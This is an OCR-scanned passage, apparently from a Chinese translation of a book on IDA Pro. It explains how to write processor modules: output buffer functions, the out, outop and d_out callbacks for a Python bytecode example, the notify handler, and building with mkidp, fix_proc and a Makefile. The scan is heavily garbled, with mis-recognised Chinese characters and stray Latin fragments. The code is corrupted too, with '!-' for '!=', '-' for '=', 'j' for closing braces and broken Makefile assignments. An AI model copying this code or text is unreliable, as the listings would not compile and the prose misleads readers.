的 输出 方案 ， 使 用 这 种 方案 ， 你 必须 在 一 个 字符 缓冲 区 中 写 人 一 行 显示 文本 ， 然 后 要 求 IDA d 
示 这 个 缓冲 区 。 生 成 一 个 输出 行 的 基本 过 程 如 下 所 示 。 
(1) 调用 init output buffer(char *buf, size t bufsize) (在 ua.hpp 中 声明 ) 初始 化 你 的 输 
出 缓冲 区 。 
(2) 利用 在 ua.hpp 中 声明 的 缓冲 区 输出 了 数 ， 通 过 添加 经 过 初始 化 的 绥 冲 区 生成 一 行内 容 。 
这 些 函 数 大 多 会 自动 写 入 上 一 步 中 指定 的 目标 缓冲 区 , 因此 , 你 通常 不 需要 问 这 些 也 数 显 式 传递 
一 个 缓冲 区 。 这 些 子 数 通 第 叫做 out. xxx 或 OutXxx。 
(3) 调用 term output_buffer() 终 止 输出 缓冲 区 ， 为 发 送 给 IDA 内 核 并 显示 出 来 做 好 准备 。 
(4) 使 用 MakeLine 或 printf line (dr lines.hpp 中 声明 ) 将 输出 缓冲 区 发 送 给 内 核 。 
注意 ,通常 init output buffer, term out buffer 和 MakeLine 仅 在 out 函数 中 调用 。 一 般 
情况 下 ，outop RASEN out 初始 化 的 当前 输出 缓冲 区 ， 因 而 不 需要 初始 化 它 目 己 的 输出 绥 
冲 区 。 
严格 来 讲 , 只 要 你 不 介意 要 完全 控制 生成 缓冲 区 的 整个 过 程 , 并 放弃 使 用 ua.hpp 文件 提供 的 
便捷 函数 ， 你 就 可 以 略 过 上 面前 4 个 步骤 中 的 缓冲 区 操作 ， 直 接 调用 MakeLine mu Fern 
成 的 输出 假设 一 个 默认 目标 (通过 init out buffer 指定 ), 许多 便捷 函数 自动 采用 cmd 变量 的 当 
前 值 。ua.hpp 文件 提供 的 一 些 有 用 的 便捷 函数 如 下 所 示 。 
口 OutMnem(int width, char *suffix)。 在 一 个 至 少 有 width 字符 的 字段 中 输出 与 cmd.itype 
对 应 的 助 记 答 ， 并 附加 指定 的 后 级 。 在 助 记 和 从 后 至 少 打印 一 个 空格 。 上 默认 的 宽度 为 8， 默 
认 的 后 级 为 NULL ,操作 数 大 小 修饰 符 可 能 需要 使 用 后 级 值 ,如 下 面 的 x86 助 记 符 :movsb、 
movsw 和 movsd。 
O out one operand(int n)。 调 用 处 理 需 的 outop 因数 打印 cmd.0perands[n]。 
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O out snprintf(const char *format，..)。 在 当前 输出 缓冲 区 后 附加 格式 化 文本 。 

口 0utValue(op t &op, int outflags)。 输 出 一 个 操作 数 的 常量 字段 。 这 个 也 数 根据 out flags 
的 值 输出 op .value 或 op.addr。 请 参见 ua.hpp 了 解 outflags 的 意义 ， 它 的 默认 值 为 0。 
这 个 函数 只 能 从 outop 中 调用 。 

O out symbol(char c)。 使 用 当前 的 标点 符号 ( COLOR SYMBOL, T£ lines.hpp 中 定义 ) 输出 给 
定 的 字符 。 这 个 函数 主要 用 于 输出 操作 数 中 的 句法 元 素 ( 因而 由 outop 调用 )， 如 逗号 和 
括号 。 

O out line(char *str, color t color)。 以 给 定 的 color 将 给 定 的 字符 串 附加 到 当前 输出 
缓冲 区 后 面 。 颜 色 在 lines.hpp 中 定义 。 注 意 ， 这 个 也 数 根本 不 会 输出 一 行 数据 。 这 个 也 
数 最 好 叫做 out stro 

Q OutLine(char *str)。 作 用 与 out. line 相同 ， 但 不 使 用 颜色 。 

O out register(char *str)。 使 用 当前 的 寄存 需 颜 色 〈COLOR_REG ) 输出 给 定 的 字符 串 。 

D out tagon(color t tag)。 在 输出 缓冲 区 中 插入 一 个 “打开 颜色 ”标签 。 随 后 输出 的 绥 冲 
区 将 以 给 定 的 颜色 显示 ， 直 到 遇 到 “关闭 颜色 ”标签 。 

O out tagoff(color t tag)。 在 输出 缓冲 区 中 插入 “关闭 颜色 ”标签 。 

请 参阅 ua.hpp 文件 了 解 其 他 可 用 于 构建 输出 带 的 输出 函数 。 

一 个 从 ua.hpp 文件 遗漏 的 输出 功能 是 输出 寄存 融 名 称 。 在 分 析 阶 段 , 根据 操作 数 使 用 的 寻 址 
模式 ， 寄 存 从 的 编写 被 和 存储 在 操作 数 的 reg 或 phrase 字段 中 。 由 于 许多 操作 数 使 用 寄存 硕 ， 
此 最 好 有 一 个 函数 能 够 根据 给 定 的 寄存 带 编 号 迅速 输出 一 个 寄存 占 字 符 串 。 下面 的 函数 提供 了 这 
样 的 基本 功能 : 


























//with the following we can do things like: OutReg(op.reg); 
void OutReg(int regnum) { 
out register(ph.regNames[regnum]); //use regnum to index register names array 


} 


IDA 仅 在 必要 时 调用 out PRG, 例如 一 个 地 址 出 现在 一 个 IDA. 窗口 , 或 一 个 反 汇 编 行 的 某 些 
部 分 被 重新 格式 化 时 。 每 次 out 被 调用 ， 它 都 会 根据 需要 输出 多 行 数据 ， 以 表示 在 cmd 全 局 变量 
中 描述 的 指令 。 为 此 ，out 通常 会 一 次 或 多 次 调用 MakeLine (或 printf 1ine )。 多 数 情况 下 ， 输 
出 一 行 (因此 只 需 调用 MakeLine 一 次 ) 数据 就 够 了 。 

如 果 需 要 多 行 数据 来 描述 一 条 指令 , 你 绝 不 能 在 输出 缓冲 区 中 添加 换行 特 ， 尝试 一 次 生成 几 
个 数据 行 。 相 反 ， 你 应 该 多 次 调用 MakeLine， 以 输出 各 行 数据 。MakeLine 的 原型 如 下 所 示 : 














bool MakeLine(const char *contents, int indent = -1); 








indent 值 为 -1 表示 使 用 默认 缩 进 ， 它 是 在 Options > General 对 话 框 的 Disassembly 部 分 指定 
的 inf.indent 的 当前 值 。 当 反 汇 编 代码 清单 中 的 一 条 指令 ( 数据 ) 跨越 几 行 时 ，indent 参数 还 
有 其 他 意义 。 在 一 条 多 行 指令 中 ， 缩 进 为 -1 的 行 表示 这 一 行为 该 指令 的 “最 重要 ”的 行 。 请 参 
考 lines.hpp 文件 中 printf line 国 数 的 注释 ， 了 解 在 这 种 情况 下 如 何 使 用 indent 的 其 他 信息 。 
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到 现在 为 止 ， 我 们 一 下 回避 讨论 注释 。 与 名 称 和 交叉 引用 一 样 ， 注 释 也 由 IDA 内 核 处 理 。 
但 是 ， 你 可 以 控制 注释 在 多 行 指令 的 哪 一行 显 示 。 在 某 种 程度 上 ， 注 释 的 显示 由 在 lines.hpp 中 
声明 的 全 局 变量 gl com 控制 。 关 于 gl _comm， 需 要 注意 的 是 ， 除 非 gl comm 被 设置 为 1， 否则 
注释 根本 不 会 显示 。 如 果 ol com 设置 为 0， 即 使 用 户 输入 1 并 且 在 Options » General 设置 中 局 
用 注释 ， 注 释 仍 然 不 会 在 你 生成 的 输出 后 面 显示 。 问 题 是 ，g1_comn 的 默认 值 为 0， 因 此 ， 如 果 
你 希望 用 户 在 使 用 你 的 处 理 带 模块 时 看 到 注释 ,你 需要 在 某 个 时 候 将 它 设置 为 1。out RAER 
多 行 数据 时 ， 如 采 你 和 希望 用 户 输入 的 注释 在 除 第 一 行 输出 以 外 的 行 中 显示 ， 那 么 ， 你 需要 控制 
gl comma 


了 解 了 构建 输出 带 的 重点 内 容 后 ， 下 面 是 示例 Python 处 理 天 的 out PRIX: 




















void py out(void) { 
char str[MAXSTR]|; //MAXSTR is an IDA define from pro.h 
init output buffer(str, sizeof(str)); 
OutMnem(12); //first we output the mnemonic 
if(cmd.Opi.type !- o void) { //then there is an argument to print 
out one operand(0); 


j 
term output buffer(); 
gl comm - 1; //we want comments! 


MakeLine(str); //output the line with default indentation 
} 


这 个 函数 以 一 种 非常 简单 的 方式 处 理 一 个 反 汇 编 行 的 各 个 组 件 。 如 果 Python 指令 包含 两 个 
操作 数 ， 我 们 可 以 使 用 out. symbol 输出 一 个 逗号 ， 然 后 再 次 调用 out_one_operand 输出 第 二 个 操 
作 数 。 多 数 情 况 下 ，outop PAZ EE out 函数 更 加 复杂 ， 因 为 操作 数 的 结构 通常 要 比 指令 的 宏观 
结构 更 加 复杂 。 执 行 outop 隐 数 的 常见 方法 是 使 用 一 个 分 文 语句 测试 操作 数 的 type 字段 的 值 ， 
并 对 操作 数 进行 相应 的 格式 化 。 

在 Python 示例 中 , 我 们 被 迫使 用 一 个 非常 简单 的 outop 函数 ， 因 为 多 数 情 况 下 , 我 们 都 缺乏 
将 整数 操作 数 转换 成 其 他 更 易 懂 的 数据 所 需 的 信息 。outop 兄 数 的 实现 过 程 如 下 所 示 ， 我 们 仅仅 
对 比较 和 相对 跳 转 进行 了 特殊 处 理 : 























char *compare ops [ ] 
E m Aes "aat : Pu E ur 


"in", "not in", "is", "is not", "exception match" 


- (1 
"pon 


B 


bool idaapi py outop(op t& x) { 
if (cmd.itype == COMPARE OP) { 
//For comparisons, the argument indicates the type of comparison to be 
//performed. Print a symbolic representation of the comparison rather 
//than a number. 
if (x.value « qnumber(compare ops)) { 
OutLine(compare ops[x.value]); 


Í 
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else { 
OutLine("BAD OPERAND"); 


j 


} 

else if (cmd.auxpref & HAS JREL) { 
//we don't test for x.type -- o near here because we need to distinguish 
//between relative jumps and absolute jumps. In our case, HAS JREL 
//implies o near 
out name expr(x, x.addr, x.addr); 


j 


else { //otherwise just print the operand value 
OutValue(x); 


return true; 


j 


除了 经 过 反 汇 编 的 指令 外 , 反 汇 编 代码 清单 中 通常 还 包括 应 表示 为 数据 的 子 市 ,在 输出 阶段 ， 
数据 显示 由 LPH 对 和 象 的 d out 成 员 处 理 。 内 核 调 用 d out. 函数 来 显示 任何 不 属于 指令 的 字 节 ， 不 
管 这 些 字 节 的 数据 类 型 是 未 知 ， 还 是 已 经 被 用 户 或 模拟 带 格 式 化 成 数据 。d_out 的 原型 如 下 : 

















void idaapi d out(ea t ea); —//format data at the specified address 


d out 函数 应 检查 与 ea 参数 指定 的 地 址 有 关 的 标志 , 并 以 所 生成 的 汇编 语言 生成 数据 的 相应 
表示 形式 。 你 必须 为 所 有 人 处理 姨 模块 指定 这 个 函数 。SDK 以 intel data 函数 的 形式 提供 了 这 个 
国 数 的 大 致 实现 ， 但 它 不 可 能 满足 你 的 特殊 要 求 。 在 Python 示例 中 ， 其 实 很 少 需 要 格式 化 静态 
数据 ， 因 为 我 们 没有 办 法 找到 这 类 数据 的 位 置 。 举 例 来 说 ， 以 下 面 这 种 方式 应 用 这 个 函数 : 





void idaapi python data(ea t ea) { 
char obuf[256]; 
init output buffer(obuf, sizeof(obuf)); 
flags t flags - get flags novalue(ea); //get the flags for address ea 
if (isWord(flags)) ( //output a word declaration 
out snprintf("Xs Xxh", ash.a word ? ash.a word : 


, get word(ea)); 


else if (isDwrd(flags)) ( //output a dword declaration 
out snprintf("AXs %xh", ash.a dword ? ash.a dword : "", get long(ea)); 
} 
else { //we default to byte declarations in all other cases 
int val = get byte(ea); 
char ch = ' '; 
if (val >= 0x20 && val <= 0x7E) { 
ch = val; 
} 
out snprintf("%s %02xh ; %c", ash.a byte ? ash.a byte : "", val, ch); 
} 
term output buffer(); 
gl comm - 1; 
MakeLine(obuf); 
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bytes.hpp 中 声明 了 一 些 函 数 , 它们 用 于 访问 和 测试 与 数据 库 中 的 任何 地 址 有 关 的 标志 。 在 这 
个 例子 中 , 标志 经 过 测试 ， 以 确定 地 址 表示 的 是 字 还 是 双 字 ,并 使 用 当前 汇编 带 模 块 中 适当 的 数 
据 声明 关键 字 生 成 相应 的 输出 。 全 局 变量 ash 是 asm t 结构 体 的 一 个 实例 ,该 结构 体 描述 反 汇 编 
代码 清单 所 使 用 的 汇编 融 语 法 的 特点 。 如 采 硕 望 生 成 更 加 复杂 的 数据 显示 ， 如 数组 ,我 们 将 需要 


更 多 信息 。 











19.3.6 ”处 理 器 通知 


在 第 17 章 中 ,我们 提 到 ， 插 件 能 够 使 用 hook to notification point PRÉ “E” ZS phg 
知 消息 。 通 过 “ 钓 住 ”通知 ,插件 能 够 获知 数据 库 中 发 生 的 各 种 操作 。 处 理 各 模块 也 采用 通知 消 
息 的 概念 ， 但 处 理 右 通知 的 实现 方式 与 插件 通知 的 实现 方式 稍 有 不 同 。 

所 有 处 理 器 模块 都 应 设置 一 个 指针 , 指向 LPH 对 象 的 noti fy 字段 中 的 一 个 通知 函数 。notify 
消 数 的 原型 如 下 所 示 : 


int idaapi notify(idp notify msgid, ...); //notify processor with a given msg 


notify 函数 是 一 个 参数 可 变 的 函数 , 它 接收 一 个 通知 代码 以 及 一 个 特定 于 通知 代码 的 参数 列 
表 ， 其 中 列表 中 的 参数 数量 可 变 。 请 参阅 idp.hpp 文件 ， 了 解 完整 的 处 理 融 通知 代码 。 通 知 消息 
既 适 用 于 人 简单 的 操作 ， 如 加 载 (init) MER (term) 处 理 右 ， 也 适用 于 复杂 的 通知 ， 如 创建 的 
代码 或 数据 、 添 加 或 删除 的 函数 、 添 加 或 删除 的 段 。idp.hpp 文件 中 还 指定 了 与 每 个 通知 代码 有 
关 的 参数 列表 。 在 分 析 notify 函数 的 示例 之 前 ,我 们 先 来 看 在 SDK 的 一 些 样 本 人 处理 兢 模 块 中 发 
现 的 下 列 注 释 : 





// A well-behaving processor module should call invoke callbacks() 
// in its notify() function. If invoke callbacks function returns 0， 
// then the processor module should process the notification itself. 
// Otherwise the code should be returned to the caller. 


为 了 确保 所 有 已 经 “ 钩 住 ”处 理 融 通知 的 模块 都 能 够 得 到 通知 ， 必 须 调 用 invoke callbacks 
限 数 。 这 使 得 内 核 将 给 定 的 通知 消息 传播 给 所 有 注册 的 回调 函数 。Python 处 理 带 中 使 用 的 notify 
汕 数 如 下 所 示 : 


static int idaapi notify(processor t::idp notify msgid, ...) { 
va list va; 
va start(va, msgid);  //setup args list 
int result - invoke callbacks(HT IDP, msgid, va); 
if (result == 0) ( 
result = 1; //default success 
switch(msgid) { 
case processor t::init: 
inf.mf = 0; //ensure little endian! 
break; 
case processor t::make data: { 
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ea t ea = va arg(va, ea 七 ) ; 

flags t flags = va arg(va, flags t); 

tid t tid = va arg(va, tid t); 

asize t len = va arg(va, asize t); 

if (len > 4) { //our d out can only handle byte, word, dword 
result = 0; //disallow big data 

} 

break; 

} 
} 


va end(va); 
return result; 


j 





notify 函数 仅 处 理 两 个 通知 代码 : init A make datas 处 理 in 让 通知 是 为 了 迫使 内 核 以 小 端 
方式 处 理 数据 。inf.mf 标志 (多数 情况 下 为 第 一 个 标志 ) 指出 内 核 使 用 的 字 节 顺序 值 CO 表示 小 
Zi. 1 RIKIN J)o 任何 时 候 如 果 要 将 字 节 转换 成 数据 , 则 发 送 make data 通知 。 在 上 面 的 例子 中 ， 
d out 因 数 只 能 处 理 字 节 、 字 和 双 字 ， 因 此 ， 该 函数 测试 所 创建 数据 的 大 小 ， 并 驳回 任何 大 于 4 
个 字 节 的 代码 。 











19.3.7 ”其 他 processor t 成 员 





在 结束 讨论 处 理 需 模块 的 创建 时 , 我 们 至 少 需要 提 及 LPH 对 象 中 的 其 他 几 个 字段 。 如 前 所 述 ， 
这 个 结构 体 中 有 大 量 函 数 指针 。 如 果 你 仔细 阅读 idp.hpp 文件 中 的 processor t 结构 体 定 义 ， 你 
会 发 现 , 有 时 候 你 完全 可 以 将 一 些 函 数 指针 设置 为 NULL, 而 且 内 核 不 会 调用 它们 。 有 理由 认为 ， 
你 需要 为 processor 芋 所 需 的 所 有 其 他 函数 提供 实现 。 总 地 来 说 ， 如 果 你 不 知道 该 如 何 做 ， 可 以 
用 一 个 空白 的 存根 也 数 蒙混 过 关 。 在 Python 处 理 器 中 , NULL 是 否 为 有 效 值 并 不 清楚 ,我 们 对 也 
数 指针 进行 的 初始 化 如 下 所 示 (请 参阅 idp.hpp 了 解 每 个 函数 的 行为 )。 

O header ， 在 示例 中 指 问 空 函数 。 

O footer ， 在 示例 中 指 问 空 函数 。 

口 segstart， 在 示例 中 指向 空隙 数 。 

O segend， 在 示例 中 指向 空 国 数 。 

Q is _ far_jump， 在 示例 中 设置 为 NULL。 

D translate， 在 示例 中 设置 为 NULL。 

O realcvt， 指 向 ieee.h 中 的 ieee realcvt。 

口 is_switch， 在 示例 中 设置 为 NULL。 

O extract_address， 在 示例 中 指 问 一 个 返回 ( BADADDR-1) 的 函数 。 

D is_sp_based， 在 示例 中 设置 为 NULL。 

D create func frame， 在 示例 中 设置 为 NULL。 

D get frame retsize， 在 示例 中 设置 为 NULL。 
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Du outspec， 在 示例 中 设置 为 NULL。 

D set idp_options， 在 示例 中 设置 为 NULL。 

除 这 些 函 数 指针 以 外 ， 还 有 下 面 3 个 数据 成 员 需 要 注意 。 

D shnames， 一 个 以 NULL 结束 的 字符 指针 数组 ， 这 些 指 针 指 问 与 处 理 右 有 关 的 短 名 称 ( 不 
超过 9 个 字符 ， 如 python )。 用 一 个 NULL 指针 结束 该 数组 。 

O lnames, 一 个 以 NULL 结束 的 字符 指针 数组 ， 这 些 指 针 指 向 与 处 理 需 有 关 的 长 名 称 〈 如 
Python 2.4 byte code )。 这 个 数组 的 元 素数 量 应 与 shnames 数组 的 元 素数 量 相 同 。 

Dasms， 一 个 以 NULL 结束 的 指针 数据 ， 这 里 的 指针 指向 目标 汇编 右 Casm t) 结构 体 。 

shnames 和 lnames 数组 指定 可 以 被 当前 处 理 融 模块 处 理 的 所 有 处 理 需 类 型 的 名 称 。 用 户 可 以 

在 Options ”General 对 话 框 的 Analysis 选项 卡 中 选择 蔡 代 的 处 理 带 ， 如 图 19-1 所 示 。 


À IDA Options E X] 


Disassembly Analysis | CrossTeferences | strings | Browser | Graph | Misc | 











Target processor [python "| Set 
Target assembler [Python assembler sl 


Analysis Kernel options i | Kernel aptionsz2 | 
Iv Enabled : SC 
Processor specific analysis options 
[« Indicator enabled 
Reanalyze program | 








图 19-1. ERRIA EAEAN ns 
支持 多 处 理 器 的 处 理 器 模块 应 处 理 processor t.newprc 通知 ， 以 获知 有 关 处 理 器 变更 的 通知 。 





asm t 结构 体 用 于 描述 汇编 语言 的 一 些 语 法 要 素 ， 如 十 六 进 制 数 、 字 符 串 和 字符 分 隔 符 的 格 
式 , 以 及 汇编 语言 常用 的 各 种 关键 字 。asms 字段 允许 某 一 个 处 理 需 模块 生成 各 种 不 同 风 格 的 汇编 
语言 。 支 持 多 个 汇编 器 的 处 理 器 模块 应 处 理 processor t.newasm 通知 ,以 获知 有 关 处 理 器 变更 的 
通知 O 

最 终 ， 我 们 的 简单 Python ARAE EERE EN P EE RS: 





ROM: 00156 LOAD CONST 12 
ROM: 00159 COMPARE OP == 
ROM: 00162 JUMP IF FALSE loc 182 


ROM: 00165 POP TOP 
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ROM: 00166 LOAD NAME 4 

ROM: 00169 LOAD ATTR 10 

ROM: 00172 LOAD NAME 5 

ROM: 00175 CALL FUNCTION 1 

ROM: 00178 POP_TOP 

ROM: 00179 JUMP FORWARD loc 183 

R0M:00182 # ---------------------------------------------------------- 
ROM: 00182 loc 182: # CODE XREF: ROM:00162j 
ROM: 00182 POP TOP 

ROM: 00183 

ROM:00183 loc 183: # CODE XREF: ROM:00179j 
ROM: 00183 LOAD CONST O 

ROM: 00186 RETURN VALUE 


虽然 我 们 可 以 生成 比 上 面 的 代码 揭示 更 多 信息 的 Python 反 汇 编 代码 清单 ， 但 是 我 们 需要 了 
解 更 多 与 .pyc 文件 格式 有 关 的 信息 。 读 者 可 以 在 本 书 的 网 站 上 找到 一 个 功能 更 加 强大 的 Python 
处 理 器 模块 。 


19.4 构建 处 理 器 模块 


构建 和 安装 IDA 处 理 器 模块 的 过 程 与 构建 和 安装 插件 和 加 载 器 的 过 程 非 常 类 似 ， 它 们 之 间 
只 存在 一 个 主要 的 差异 ， 如 果 不 遵 照 这 个 差异 ， 可 能 导致 IDA 无 法 使 用 你 的 处 理 器 。 构 建 过 程 
中 的 一 些 细微 差异 包括 以 下 几 点 。 

(1) Windows, Linux 平台 和 OS X 平台 处 理 需 的 文件 扩展 名 分 别 为 .w32/,w64 、.ilx/ilx64 
和 .imc/.imc64。 

(2) SDK 示例 处 理 器 (及 我 们 自己 的 处 理 器 ) 的 构建 脚本 将 新 建 的 处 理 器 二 进 制 文件 存储 在 
<SDKDIR>/bin/procs 目录 中 。 

(3) 要 安装 处 理 需 模块 ， 需 要 将 已 编译 的 处 理 名 二 进 制 文件 复制 到 <IDADIR>/procs 目录 中 。 

(4) Windows 处 理 器 模块 需要 使 用 SDK 提供 的 一 个 自 定义 MS-DOS 存根 ”。 

(5) 基于 Windows 的 处 理 需 模块 需要 采用 插件 和 加 载 器 不 需要 的 一 个 自 定 义 后 续 处 理 步骤 
( post-processing step ) 这 个 步骤 用 于 在 已 编 详 处 理 需 二 进 制 文件 中 的 特定 位 置 插 入 一 个 处 理 善 摘 
述 字符 串 。 这 个 描述 字符 串 在 IDA 的 “加 载 文 件 ” 对 话 框 的 处 理 器 下 拉 列 表 部 分 显示 。 

在 构建 一 个 基于 Windows 的 处 理 需 模块 时 , 你 需要 使 用 SDK 提供 的 一 个 目 定 义 MS-DOS f£ 
IR (<SDKDIR>/module/stub )。 要 使 用 自 定义 MS-DOS 存根 ， 必 须 指 示 链 接 器 使 用 你 的 存根 ， 而 
不 是 以 其 他 形式 包含 的 默认 存根 。 在 使 用 特定 于 Windows 的 编译 器 时 ， 有 时 候 你 可 以 通过 使 用 
模块 定义 ( .def ) 文件 指定 备用 的 存根 。Borland 构建 工具 (被 Hex-Rays 采用 ) 支持 使 用 .def 文件 
指定 奉 代 存根 。 如 果 你 碰巧 使 用 的 是 Borland 工具 ，SDK 包含 的 <SDKDIR>/module/idp.def 文件 
可 供 你 使 用 。GNU 和 微软 链接 器 均 文 持 .def 文件 ( 只 是 使 用 的 语法 稍 有 不 同 )。 但是， 它们 都 不 
支持 备用 的 MS-DOS 存根 的 规范 ， 因 此 ， 很 明显 ， 你 使 用 这 类 编译 器 时 可 能 会 遇 到 问题 。 
































(D MS-DOS 头 部 存根 包括 一 个 MS-DOS 文件 状 ， 以 及 警告 用 户 Windows 程序 不 能 在 MS-DOS 模式 下 运行 的 代码 。 
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假设 在 某 个 时 候 ， 你 设法 使 用 SDK 提供 的 目 定 义 MS-DOS 存根 构建 了 你 的 处 理 融 模 块 ， 那 
么 , 你 仍然 必须 在 处 理 融 二 进 制 文件 中 插入 处 理 带 描述 注释 。 <SDKDIR>/bin/mkidp.exe 实用 工具 
即 用 于 这 一 目的 。 你 可 以 使 用 下 面 的 语法 调用 rkidp， 给 一 个 处 理 融 添加 一 段 注 释 : 





$ mkidp module description 
这 里 , module 是 你 的 处 理 器 模块 的 路 径 , 而 description 是 你 的 模块 的 文本 描述 , 如 下 所 示 : 
Long module name:short module name 

要 给 我 们 的 Python 处 理 带 模块 添加 一 段 描述 ， 可 以 使 用 下 面 的 命令 行 : 

$ ./mkidp procs/python.w32 "Python Bytecode:python" 


mkidp KHATRI UFP WEEN 128 学 市 的 命名 模块 中 搬入 所 提供 的 摘 述 ， 插 入 描述 
的 空间 位 于 MS-DOS 存根 与 PE 头 部 之 间 (假设 这 样 的 空间 存在 ). WRAT PE 头 部 过 于 接近 
MS-DOS 存根 的 结尾 部 分 ， 而 没有 足够 的 空间 ， 你 将 收 到 以 下 错误 消息 : 





mkidp: too long processor description 


这 时 , It ou Cl ZB T EHE LE, HX HIIU BEBE SPA SERA ESSA IC E 
的 空间 可 以 插入 描述 ， 而 使 用 GNU 链接 需 构 建 的 处 理 需 却 没有 足够 的 空间 。 

为 了 消除 困惑 ， 并 使 用 微软 工具 或 GNU 工具 ， 我 们 开发 了 一 个 叫做 fix proc 的 实用 工 
具 ， 读 者 可 以 在 本 书 网 站 的 第 19 章 部 分 下 载 该 工具 。fix_proc 实用 工具 使 用 和 mkidp 相同 的 
命令 行 语 法 ， 但 是 ， 它 还 提供 了 其 他 功能 ， 可 以 在 使 用 大 多 数 编译 需 构 建 的 处 理 需 模块 中 插 
入 一 段 处 理 器 描述 。 执 行 fix proc 后 ， 它 用 SDK 提供 的 存根 替换 处 理 器 现 有 的 MS-DOS Ze 
TR. ( 因而 不 需要 在 构建 过 程 中 使 用 .def 文件 )。 同 时 ，fix_proc 执行 必要 的 操作 , 重新 定位 处 
Aen PE 头 部 ,创建 足够 的 空间 来 保存 处 理 融 描述 字符 串 ， 最 后 将 描述 字符 串 插 入 到 处 理 需 
二 进 制 文件 中 的 正确 位 置 。 在 对 处 理 需 模块 执行 所 需 的 “后 续 处 理 步 又 ”时 , 我 们 用 fix proc 
代替 mkidp。 


























说 明 D00000000000000000 SDKUO MS-DoSUUDOOOD IDAT[ D D U U 
U 28[(jD ODDO D HL DL HELD ELO IDAD EDO OLD KB] fix proci LE EL UL] SDK [I 
uluubiuu Ms-bosi[]ibingnpagogBiggbHgHl dli gd BOO OUO BLU DL 
UU 


根据 构建 处 理 带 所 使 用 的 工具 ， 表 19-1 188 "enk aspnet. 
只 有 拥有 有 效 搬 述 的 处 理 盯 才 会 出 现在 “文件 加 载 ” 对 话 框 中 。 换 言 之 ， 如果 没 有 有 效 的 描 
述 字 段 ， 你 将 不 可 能 选择 处 理 带 模块 。 
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X 19-1 后 处 理 的 IDA 处 理 器 模块 〈 按 编译 器 ) 


使 用 mkidp 后 使 用 fix proc 后 


TH 是 否 使 用 .def | 是 否 拥有 存根 | 是 否 拥有 存根 | 是 否 拥有 描述 | 是 否 拥 有 存根 | 是 否 拥有 描述 








Borland 是 
微软 是 
GNU 是 











与 构建 加 载 融 模块 相 比 ， 构 建 处 理 融 模块 过 程 中 的 所 有 这 些 差 异 需要 我 们 对 表 17-1 中 的 生 
成 文件 进行 更 多 的 修改 .一 个 经 过 修改 的 用 于 构建 示例 Python 处 理 带 的 生成 文件 如 代码 清单 19-1 
WC 


代码 清单 19-1 构建 Python 处 理 需 模块 的 生成 文件 
#Set this variable to point to your SDK directory 
IDA SDK-. ./../ 


PLATFORM-$(shell uname | cut -f 1 -d ) 


ifneq "S(PLATFORM)" "MINGW32" 
IDA-$(HOME)/ida 
endif 


#Set this variable to the desired name of your compiled processor 
PROC=python 


#Specify a description string for your processor, this is required 
ihe syntax is «long name»:«short name» 
@ DESCRIPTION-Python Bytecode:python 


ifeq "S(PLATFORM)" "MINGW32" 

PLATFORM CFLAGS--D NT D IDP  -DWIN32 -Os -fno-rtti 
PLATFORM LDFLAGS--shared -s 

LIBDIR-$(shell find ../../ -type d | grep -E "(lib|lib/)gcc.w32") 
ifeq ($(strip $(LIBDIR)),) 
LIBDIR-../../lib/x86 win gcc 32 

endif 

IDALIB-$(LIBDIR)/ida.a 

PROC EXT-.w32 

else ifeq "$(PLATFORM)" "Linux" 

PLATFORM CFLAGS--D LINUX ` 

PLATFORM LDFLAGS--shared -s 

IDALIB--lida 

IDADIR--L$(IDA) 

PROC EXT-.ilx 


else ifeq "$(PLATFORM)" "Darwin" 
PLATFORM CFLAGS--D MAC ` 
PLATFORM LDFLAGS--dynamiclib 
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IDALIB--lida 
IDADIR--L$(IDA)/idaq.app/Contents/MacOs 
PROC EXT-.imc 

endif 


itPlatform specific compiler flags 
CFLAGS--Wextra $(PLATFORM CFLAGS) 


itPlatform specific ld flags 
LDFLAGS-$(PLATFORM LDFLAGS) 


specify any additional libraries that you may need 
EXTRALIBS- 


# Destination directory for compiled plugins 
OUTDIR-$(IDA SDK)bin/procs/ 


# Postprocessing tool to add processor comment 
@ MKIDP-$(IDA SDK)bin/fix proc 
HMKIDP-$ (IDA)bin/mkidp 





#list out the object files in your project here 
0BJS-ana.o emu.o ins.o out.o reg.o 


BINARY-$(OUTDIR)$(PROC)$(PROC EXT) 
all: $(OUTDIR) $(BINARY) 


clean: 
Hm *.o 
-@rm $(BINARY) 


$(OUTDIR): 
-Qmkdir -p $(OUTDIR) 


CC=g++ 
INC=-I$(IDA SDK)include/ 


4.0: %.cpp 
$(CC) -c $(CFLAGS) $(INC) $< -o $8 


LD=g++ 
ifeq "$(PLATFORM)" "MINGW32" 
#Windows processor's require post processing 
$(BINARY): $(0BJS) 
$(LD) $(LDFLAGS) -o $8 $(0BJS) $(IDALIB) $(EXTRALIBS) 
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© $(MKIDP) $(BINARY) "$(DESCRIPTION)" 
else 
$(BINARY): $(0BJS) 
$(LD) $(LDFLAGS) -o $8 $(0BJS) $(IDALIB) $(EXTRALIBS) 
endif 


#change python below to the name of your processor, make sure to add any 
#additional files that your processor is dependent on 

python.o: python.cpp 

ana.o: ana.cpp 

emu.o: emu.cpp 

ins.o: ins.cpp 

out.o: out.cpp 

reg.o: reg.cpp 


除了 后 级 以 及 处 理 带 的 上 默认 文件 位 置 这 些 细微 的 差别 外 ， 主 要 差异 包括 描述 字符 串 的 定义 
(@ )、 插 入 撞 述 字符 串 的 实用 工具 C6 ) 的 规范 以 及 增加 的 一 个 在 Windows 处 理 融 模块 中 插入 质 
述 字 符 串 ( @ ) 的 构建 步 又 。 
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可 能 你 正 考 虑 开发 处 理 右 模块 , 但 你 会 注意 到 , 现 有 的 处 理 器 模块 几乎 能 够 执行 你 所 需 的 任 
何 操作 。 如 果 你 拥有 处 理 器 模块 的 源 代 码 ， 可 以 轻松 地 对 其 进行 修改 ， 以 满足 自己 的 需要 。 另 一 
方面 ， 如 果 你 没有 源 代 码 ， 那 么 你 可 能 不 太 幸 运 。 幸 好 IDA 提供 了 一 种 通过 搬 件 定制 现 有 处 理 
顺 的 机 制 。 通 过 “ 钩 住 ” 处 理 器 通知， 插件 模块 可 以 拦截 对 现 有 处 理 顺 的 分 析 器 、 模 拟 需 和 输出 
全 阶段 的 一 次 或 多 次 调用 。 和 定制 一 个 处 理 硕 的 洲 在 应 用 包括 以 下 几 项 。 
口 扩展 现 有 处 理 器 的 功能 ， 使 其 能 够 识别 其 他 指令 。 
口 更 正 现 有 处 理 顺 模块 中 受到 破坏 的 功能 〈 虽然 告诉 Tlfak 你 发 现 了 一 个 缺陷 ， 它 会 更 快 得 
到 修复 )。 
口 定 制 现 有 处 理 融 模块 的 输出 ， 使 其 满足 你 的 特殊 要 求 。 
